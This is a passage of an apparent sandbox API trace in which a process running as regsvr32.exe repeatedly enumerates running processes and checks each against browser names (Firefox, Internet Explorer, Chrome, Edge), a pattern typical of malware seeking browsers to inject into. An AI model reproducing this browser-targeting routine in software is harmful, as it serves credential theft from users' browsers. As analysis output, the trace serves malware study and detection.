lpString2="chrome.exe") returned 1 [0176.040] lstrcmpiA (lpString1="regsvr32.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.040] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0176.040] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0176.040] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0176.040] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0176.040] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0176.040] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0176.041] CloseHandle (hObject=0xd4) returned 1 [0176.041] Sleep (dwMilliseconds=0x3e8) [0177.084] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0177.086] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.087] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0177.087] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0177.087] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0177.087] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0177.087] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0177.087] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0177.087] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0177.087] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0177.088] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0177.088] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0177.088] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0177.088] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0177.088] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0177.088] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.088] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0177.089] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0177.089] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0177.089] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0177.089] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.089] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0177.089] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0177.089] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0177.089] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0177.089] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.089] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0177.090] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0177.090] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0177.090] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0177.090] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.090] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0177.090] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0177.090] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0177.090] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0177.090] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.090] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0177.091] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0177.091] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0177.091] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0177.091] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.091] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0177.091] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0177.091] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0177.091] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0177.092] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.092] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0177.092] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0177.092] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0177.092] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0177.092] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.092] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.093] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0177.093] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0177.093] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0177.093] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.093] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.093] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0177.093] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0177.093] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0177.093] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.093] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.094] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0177.094] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0177.094] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0177.094] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.094] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.094] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0177.094] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0177.094] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0177.094] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.094] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.095] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0177.095] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0177.095] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0177.095] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.095] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0177.095] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0177.095] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0177.095] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0177.095] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.096] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.096] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0177.096] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0177.096] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0177.096] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.096] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.097] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0177.097] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0177.097] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0177.097] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.097] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0177.097] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0177.097] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0177.097] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0177.097] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.097] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0177.098] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0177.098] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0177.098] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0177.098] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.098] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0177.098] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0177.098] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0177.098] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0177.098] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.098] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.099] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0177.099] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0177.099] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0177.099] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.099] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0177.099] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0177.100] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0177.100] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0177.100] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.100] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0177.100] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0177.100] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0177.100] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0177.100] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.101] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0177.101] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0177.101] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0177.101] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0177.101] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.101] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0177.102] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0177.102] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0177.102] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0177.102] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.102] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0177.102] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0177.102] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0177.102] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0177.102] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.102] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0177.103] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0177.103] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0177.103] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0177.103] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.103] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0177.103] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0177.103] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0177.103] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0177.103] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.103] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0177.104] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0177.104] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0177.104] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0177.104] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.104] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0177.104] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0177.104] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0177.104] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0177.104] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.104] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0177.105] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0177.105] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0177.105] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0177.105] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.105] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0177.106] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0177.106] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0177.106] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0177.106] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.106] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0177.106] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0177.106] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0177.106] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0177.106] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.106] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0177.107] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0177.107] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0177.107] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0177.107] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.107] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0177.108] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0177.108] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0177.108] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0177.108] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.108] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0177.108] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0177.108] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0177.108] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0177.108] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.108] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0177.109] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0177.109] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0177.109] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0177.109] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.109] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0177.109] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0177.109] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0177.109] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0177.110] lstrcmpiA (lpString1="dallasr.exe", 